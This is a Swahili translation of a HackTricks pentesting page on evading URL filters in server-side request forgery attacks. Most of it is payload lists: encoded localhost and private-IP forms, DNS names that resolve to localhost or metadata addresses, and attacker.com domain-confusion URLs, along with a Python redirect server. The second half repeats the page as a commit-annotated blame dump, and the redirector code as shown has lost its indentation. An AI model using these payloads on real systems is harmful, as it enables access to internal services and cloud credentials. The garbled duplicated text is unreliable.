hacktricks/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md

# Kupitisha URL

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inayotangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>

Pata udhaifu unaofaa zaidi ili uweze kuzirekebisha haraka. Intruder inafuatilia eneo lako la shambulio, inatekeleza uchunguzi wa vitisho wa proaktivi, inapata masuala katika mfumo wako mzima wa teknolojia, kutoka kwa APIs hadi programu za wavuti na mifumo ya wingu. [**Jaribu bure**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) leo.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

***

### Mwenyeji wa ndani (Localhost)
```bash
# Localhost
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://127.000000000000000.1
http://0
http:@0/ --> http://localhost/
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
http://①②⑦.⓪.⓪.⓪

# CDIR bypass
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

# Dot bypass
127。0。0。1
127%E3%80%820%E3%80%820%E3%80%821

# Decimal bypass
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1

# Octal Bypass
http://0177.0000.0000.0001
http://00000177.00000000.00000000.00000001
http://017700000001

# Hexadecimal bypass
127.0.0.1 = 0x7f 00 00 01
http://0x7f000001/ = http://127.0.0.1
http://0xc0a80014/ = http://192.168.0.20
0x7f.0x00.0x00.0x01
0x0000007f.0x00000000.0x00000000.0x00000001

# Add 0s bypass
127.000000000000.1

# You can also mix different encoding formats
# https://www.silisoftware.com/tools/ipconverter.php

# Malformed and rare
localhost:+11211aaa
localhost:00011211aaaa
http://0/
http://127.1
http://127.0.1

# DNS to localhost
localtest.me = 127.0.0.1
customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
mail.ebc.apple.com = 127.0.0.6 (localhost)
127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://bugbounty.dod.network = 127.0.0.2 (localhost)
1ynrnhl.xip.io == 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1
```
![](<../../.gitbook/assets/image (649) (1) (1).png>)

**Kifurushi cha Burp** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) inatekeleza njia za kuepuka muundo wa IP.

### Mchambuzi wa Kikoa
```bash
https:attacker.com
https:/attacker.com
http:/\/\attacker.com
https:/\attacker.com
//attacker.com
\/\/attacker.com/
/\/attacker.com/
/attacker.com
%0D%0A/attacker.com
#attacker.com
#%20@attacker.com
@attacker.com
http://169.254.1698.254\@attacker.com
attacker%00.com
attacker%E3%80%82com
attacker。com
ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ
```

```
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰
⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ
Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
```
### Utata wa Kikoa

Domain confusion ni mbinu ya kawaida ya kudanganya mtandao ambapo mshambuliaji anajaribu kuchanganya mfumo wa kikoa ili kufanikisha mashambulizi ya SSRF (Server-Side Request Forgery). Katika mashambulizi ya SSRF, mshambuliaji anajaribu kudanganya seva ya lengo ili kufanya ombi la mtandao kwa niaba yake.

Kwa kawaida, seva ya lengo inategemea URL ili kujua ni wapi ombi linapaswa kwenda. Hata hivyo, mshambuliaji anaweza kutumia utata wa kikoa kubadilisha URL iliyoombwa na kufanya ombi liende kwa seva nyingine ambayo mshambuliaji anadhibiti.

Kuna njia kadhaa za kufanikisha utata wa kikoa, ikiwa ni pamoja na:

1. Matumizi ya kikoa kinachofanana: Mshambuliaji anaweza kutumia kikoa kinachofanana na kikoa halisi cha lengo ili kudanganya seva. Kwa mfano, badala ya kutumia "example.com", mshambuliaji anaweza kutumia "examp1e.com" au "exarnple.com".

2. Matumizi ya kikoa kilichosahaulika: Mshambuliaji anaweza kutumia kikoa ambacho kimeachwa au kimesahaulika na mmiliki wake. Hii inaweza kutokea ikiwa kikoa kilikuwa kinatumika hapo awali lakini sasa hakipo tena. Mshambuliaji anaweza kuchukua udhibiti wa kikoa hicho na kutumia utata wa kikoa.

3. Matumizi ya kikoa cha ndani: Mshambuliaji anaweza kutumia kikoa cha ndani ambacho kinarejelea anwani ya IP ya seva ya lengo. Hii inaweza kufanyika kwa kubadilisha faili ya mwenyeji (hosts file) kwenye mfumo wa mshambuliaji ili kuelekeza kikoa cha ndani kwa anwani ya IP ya seva ya lengo.

Utata wa kikoa ni mbinu hatari ya kudanganya mtandao ambayo inaweza kusababisha mashambulizi ya SSRF. Ni muhimu kwa wamiliki wa seva na watengenezaji wa programu kuchukua hatua za kuzuia utata wa kikoa kwa kufuatilia na kudhibiti matumizi ya URL katika mifumo yao.
```bash
# Try also to change attacker.com for 127.0.0.1 to try to access localhost
# Try replacing https by http
# Try URL-encoded characters
https://{domain}@attacker.com
https://{domain}.attacker.com
https://{domain}%6D@attacker.com
https://attacker.com/{domain}
https://attacker.com/?d={domain}
https://attacker.com#{domain}
https://attacker.com@{domain}
https://attacker.com#@{domain}
https://attacker.com%23@{domain}
https://attacker.com%00{domain}
https://attacker.com%0A{domain}
https://attacker.com?{domain}
https://attacker.com///{domain}
https://attacker.com\{domain}/
https://attacker.com;https://{domain}
https://attacker.com\{domain}/
https://attacker.com\.{domain}
https://attacker.com/.{domain}
https://attacker.com\@@{domain}
https://attacker.com:\@@{domain}
https://attacker.com#\@{domain}
https://attacker.com\anything@{domain}/
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com

# On each IP position try to put 1 attackers domain and the others the victim domain
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/

#Parameter pollution
next={domain}&next=attacker.com
```
### Kupita njia na Upanuzi

Ikiwa unahitajika URL lazima imalizike kwa njia au upanuzi, au lazima iwe na njia, unaweza kujaribu moja ya njia zifuatazo za kuvuka:
```
https://metadata/vulerable/path#/expected/path
https://metadata/vulerable/path#.extension
https://metadata/expected/path/..%2f..%2f/vulnerable/path
```
### Fuzzing

Zana [**recollapse**](https://github.com/0xacb/recollapse) inaweza kuzalisha mabadiliko kutoka kwa kuingiza iliyotolewa ili kujaribu kuepuka regex iliyotumiwa. Angalia [**chapisho hili**](https://0xacb.com/2022/11/21/recollapse/) pia kwa habari zaidi.

### Kuepuka kupitia upyaishaji

Inawezekana kwamba seva ina **kuchuja ombi asili** la SSRF **lakini sio** jibu la **upyaishaji** linalowezekana kwa ombi hilo.\
Kwa mfano, seva inayoweza kudhurika na SSRF kupitia: `url=https://www.google.com/` inaweza **kuchuja param url**. Lakini ikiwa unatumia [seva ya python kujibu na 302](https://pastebin.com/raw/ywAUhFrv) mahali unapotaka kuendelekeza, unaweza kuwa na uwezo wa **kufikia anwani za IP zilizofichwa** kama 127.0.0.1 au hata **itifaki zilizofichwa** kama gopher.\
[Angalia ripoti hii.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
```python
#!/usr/bin/env python3

#python3 ./redirector.py 8000 http://127.0.0.1/

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2:
print("Usage: {} <port_number> <url>".format(sys.argv[0]))
sys.exit()

class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', sys.argv[2])
self.end_headers()

HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
```
## Mbinu Zilizoelezwa

### Mbinu ya Mshale wa Nyuma

*Mbinu ya mshale wa nyuma* inatumia tofauti kati ya [Standard ya URL ya WHATWG](https://url.spec.whatwg.org/#url-parsing) na [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). Wakati RFC3986 ni mfumo wa jumla wa URI, WHATWG ni maalum kwa URL za wavuti na imechukuliwa na vivinjari vya kisasa. Tofauti muhimu iko katika kutambuliwa kwa kiwango cha WHATWG cha mshale wa nyuma (`\`) kama sawa na mshale wa mbele (`/`), ambayo inaathiri jinsi URL zinavyopangiliwa, hasa kwa kuashiria mpito kutoka jina la mwenyeji kwenda kwenye njia katika URL.

![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)

### Utata Mwingine

![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../.gitbook/assets/image (629).png>)

picha kutoka [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)


## Marejeo
* [https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25](https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)

<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>

Tafuta udhaifu unaofaa zaidi ili uweze kuyatatua haraka. Intruder inafuatilia eneo lako la shambulio, inatekeleza uchunguzi wa vitisho wa kujitokeza, inapata masuala katika mfumo wako wa teknolojia mzima, kutoka kwa API hadi programu za wavuti na mifumo ya wingu. [**Jaribu bure**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) leo.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}


<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha** [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Translated to Swahili 2024-02-11 02:13:58 +00:00			`# Kupitisha URL`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
arte 2024-01-01 17:15:42 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Ikiwa unataka kuona kampuni yako inayotangazwa katika HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia [MPANGO WA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [swag rasmi ya PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

intruder 2023-09-02 23:51:32 +00:00			`<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>`
intruder 2023-09-02 23:48:41 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Pata udhaifu unaofaa zaidi ili uweze kuzirekebisha haraka. Intruder inafuatilia eneo lako la shambulio, inatekeleza uchunguzi wa vitisho wa proaktivi, inapata masuala katika mfumo wako mzima wa teknolojia, kutoka kwa APIs hadi programu za wavuti na mifumo ya wingu. [Jaribu bure](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) leo.`
intruder 2023-09-02 23:48:41 +00:00
			`{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}`

			`***`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Mwenyeji wa ndani (Localhost)`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			```bash
fix mess 2022-05-01 12:41:36 +00:00			`# Localhost`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://127.0.0.1:80`
			`http://127.0.0.1:443`
			`http://127.0.0.1:22`
			`http://127.1:80`
GITBOOK-3885: change request with no subject merged in GitBook 2023-04-30 22:29:45 +00:00			`http://127.000000000000000.1`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://0`
GitBook: [#3686] No subject 2022-12-19 23:36:02 +00:00			`http:@0/ --> http://localhost/`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://0.0.0.0:80`
			`http://localhost:80`
			`http://[::]:80/`
			`http://[::]:25/ SMTP`
			`http://[::]:3128/ Squid`
			`http://[0000::1]:80/`
			`http://[0:0:0:0:0:ffff:127.0.0.1]/thefile`
			`http://①②⑦.⓪.⓪.⓪`

fix mess 2022-05-01 12:41:36 +00:00			`# CDIR bypass`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://127.127.127.127`
			`http://127.0.1.3`
			`http://127.0.0.0`

			`# Dot bypass`
			`127。0。0。1`
			`127%E3%80%820%E3%80%820%E3%80%821`

fix mess 2022-05-01 12:41:36 +00:00			`# Decimal bypass`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://2130706433/ = http://127.0.0.1`
			`http://3232235521/ = http://192.168.0.1`
			`http://3232235777/ = http://192.168.1.1`

fix mess 2022-05-01 12:41:36 +00:00			`# Octal Bypass`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`http://0177.0000.0000.0001`
			`http://00000177.00000000.00000000.00000001`
			`http://017700000001`

fix mess 2022-05-01 12:41:36 +00:00			`# Hexadecimal bypass`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`127.0.0.1 = 0x7f 00 00 01`
			`http://0x7f000001/ = http://127.0.0.1`
			`http://0xc0a80014/ = http://192.168.0.20`
			`0x7f.0x00.0x00.0x01`
			`0x0000007f.0x00000000.0x00000000.0x00000001`

GITBOOK-3885: change request with no subject merged in GitBook 2023-04-30 22:29:45 +00:00			`# Add 0s bypass`
			`127.000000000000.1`

fix mess 2022-05-01 12:41:36 +00:00			`# You can also mix different encoding formats`
			`# https://www.silisoftware.com/tools/ipconverter.php`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
fix mess 2022-05-01 12:41:36 +00:00			`# Malformed and rare`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`localhost:+11211aaa`
			`localhost:00011211aaaa`
			`http://0/`
			`http://127.1`
			`http://127.0.1`

fix mess 2022-05-01 12:41:36 +00:00			`# DNS to localhost`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`localtest.me = 127.0.0.1`
			`customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1`
			`mail.ebc.apple.com = 127.0.0.6 (localhost)`
			`127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)`
			`www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com`
			`http://customer1.app.localhost.my.company.127.0.0.1.nip.io`
			`http://bugbounty.dod.network = 127.0.0.2 (localhost)`
			`1ynrnhl.xip.io == 169.254.169.254`
			`spoofed.burpcollaborator.net = 127.0.0.1`
			```
GitBook: [#3124] No subject 2022-04-25 12:04:04 +00:00			`![](<../../.gitbook/assets/image (649) (1) (1).png>)`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Kifurushi cha Burp [Burp-Encode-IP](https://github.com/e1abrador/Burp-Encode-IP) inatekeleza njia za kuepuka muundo wa IP.`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Mchambuzi wa Kikoa`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			```bash
			`https:attacker.com`
			`https:/attacker.com`
			`http:/\/\attacker.com`
			`https:/\attacker.com`
			`//attacker.com`
			`\/\/attacker.com/`
			`/\/attacker.com/`
			`/attacker.com`
			`%0D%0A/attacker.com`
			`#attacker.com`
			`#%20@attacker.com`
			`@attacker.com`
GitBook: [#3723] No subject 2023-01-02 12:00:18 +00:00			`http://169.254.1698.254\@attacker.com`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`attacker%00.com`
			`attacker%E3%80%82com`
			`attacker。com`
			`ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ`
			```

			```
			`① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾`
			`⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗`
			`⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰`
			`⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ`
			`Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ`
			`ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Utata wa Kikoa`

			`Domain confusion ni mbinu ya kawaida ya kudanganya mtandao ambapo mshambuliaji anajaribu kuchanganya mfumo wa kikoa ili kufanikisha mashambulizi ya SSRF (Server-Side Request Forgery). Katika mashambulizi ya SSRF, mshambuliaji anajaribu kudanganya seva ya lengo ili kufanya ombi la mtandao kwa niaba yake.`

			`Kwa kawaida, seva ya lengo inategemea URL ili kujua ni wapi ombi linapaswa kwenda. Hata hivyo, mshambuliaji anaweza kutumia utata wa kikoa kubadilisha URL iliyoombwa na kufanya ombi liende kwa seva nyingine ambayo mshambuliaji anadhibiti.`

			`Kuna njia kadhaa za kufanikisha utata wa kikoa, ikiwa ni pamoja na:`

			`1. Matumizi ya kikoa kinachofanana: Mshambuliaji anaweza kutumia kikoa kinachofanana na kikoa halisi cha lengo ili kudanganya seva. Kwa mfano, badala ya kutumia "example.com", mshambuliaji anaweza kutumia "examp1e.com" au "exarnple.com".`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`2. Matumizi ya kikoa kilichosahaulika: Mshambuliaji anaweza kutumia kikoa ambacho kimeachwa au kimesahaulika na mmiliki wake. Hii inaweza kutokea ikiwa kikoa kilikuwa kinatumika hapo awali lakini sasa hakipo tena. Mshambuliaji anaweza kuchukua udhibiti wa kikoa hicho na kutumia utata wa kikoa.`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`3. Matumizi ya kikoa cha ndani: Mshambuliaji anaweza kutumia kikoa cha ndani ambacho kinarejelea anwani ya IP ya seva ya lengo. Hii inaweza kufanyika kwa kubadilisha faili ya mwenyeji (hosts file) kwenye mfumo wa mshambuliaji ili kuelekeza kikoa cha ndani kwa anwani ya IP ya seva ya lengo.`

			`Utata wa kikoa ni mbinu hatari ya kudanganya mtandao ambayo inaweza kusababisha mashambulizi ya SSRF. Ni muhimu kwa wamiliki wa seva na watengenezaji wa programu kuchukua hatua za kuzuia utata wa kikoa kwa kufuatilia na kudhibiti matumizi ya URL katika mifumo yao.`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			```bash
			`# Try also to change attacker.com for 127.0.0.1 to try to access localhost`
Reorganize Domain Confusion list in SSRF * Remove duplicates * Add payloads 2023-05-06 02:28:16 +00:00			`# Try replacing https by http`
			`# Try URL-encoded characters`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`https://{domain}@attacker.com`
			`https://{domain}.attacker.com`
Reorganize Domain Confusion list in SSRF * Remove duplicates * Add payloads 2023-05-06 02:28:16 +00:00			`https://{domain}%6D@attacker.com`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`https://attacker.com/{domain}`
			`https://attacker.com/?d={domain}`
Reorganize Domain Confusion list in SSRF * Remove duplicates * Add payloads 2023-05-06 02:28:16 +00:00			`https://attacker.com#{domain}`
			`https://attacker.com@{domain}`
			`https://attacker.com#@{domain}`
			`https://attacker.com%23@{domain}`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			`https://attacker.com%00{domain}`
			`https://attacker.com%0A{domain}`
			`https://attacker.com?{domain}`
			`https://attacker.com///{domain}`
			`https://attacker.com\{domain}/`
			`https://attacker.com;https://{domain}`
			`https://attacker.com\{domain}/`
			`https://attacker.com\.{domain}`
			`https://attacker.com/.{domain}`
			`https://attacker.com\@@{domain}`
			`https://attacker.com:\@@{domain}`
			`https://attacker.com#\@{domain}`
			`https://attacker.com\anything@{domain}/`
Reorganize Domain Confusion list in SSRF * Remove duplicates * Add payloads 2023-05-06 02:28:16 +00:00			`https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
			`# On each IP position try to put 1 attackers domain and the others the victim domain`
			`http://1.1.1.1 &@2.2.2.2# @3.3.3.3/`

			`#Parameter pollution`
			`next={domain}&next=attacker.com`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Kupita njia na Upanuzi`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Ikiwa unahitajika URL lazima imalizike kwa njia au upanuzi, au lazima iwe na njia, unaweza kujaribu moja ya njia zifuatazo za kuvuka:`
GitBook: [#3109] No subject 2022-04-20 09:04:20 +00:00			```
			`https://metadata/vulerable/path#/expected/path`
			`https://metadata/vulerable/path#.extension`
			`https://metadata/expected/path/..%2f..%2f/vulnerable/path`
			```
GitBook: [#3670] No subject 2022-12-05 11:09:36 +00:00			`### Fuzzing`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`Zana [recollapse](https://github.com/0xacb/recollapse) inaweza kuzalisha mabadiliko kutoka kwa kuingiza iliyotolewa ili kujaribu kuepuka regex iliyotumiwa. Angalia [chapisho hili](https://0xacb.com/2022/11/21/recollapse/) pia kwa habari zaidi.`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Kuepuka kupitia upyaishaji`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Inawezekana kwamba seva ina kuchuja ombi asili la SSRF lakini sio jibu la upyaishaji linalowezekana kwa ombi hilo.\`
			Kwa mfano, seva inayoweza kudhurika na SSRF kupitia: `url=https://www.google.com/` inaweza kuchuja param url. Lakini ikiwa unatumia [seva ya python kujibu na 302](https://pastebin.com/raw/ywAUhFrv) mahali unapotaka kuendelekeza, unaweza kuwa na uwezo wa kufikia anwani za IP zilizofichwa kama 127.0.0.1 au hata itifaki zilizofichwa kama gopher.\
			`[Angalia ripoti hii.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00			```python
			`#!/usr/bin/env python3`

			`#python3 ./redirector.py 8000 http://127.0.0.1/`

			`import sys`
			`from http.server import HTTPServer, BaseHTTPRequestHandler`

			`if len(sys.argv)-1 != 2:`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`print("Usage: {} <port_number> <url>".format(sys.argv[0]))`
			`sys.exit()`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
			`class Redirect(BaseHTTPRequestHandler):`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`def do_GET(self):`
			`self.send_response(302)`
			`self.send_header('Location', sys.argv[2])`
			`self.end_headers()`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
			`HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Mbinu Zilizoelezwa`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Mbinu ya Mshale wa Nyuma`
GitBook: [#3007] No subject 2022-02-13 12:30:13 +00:00
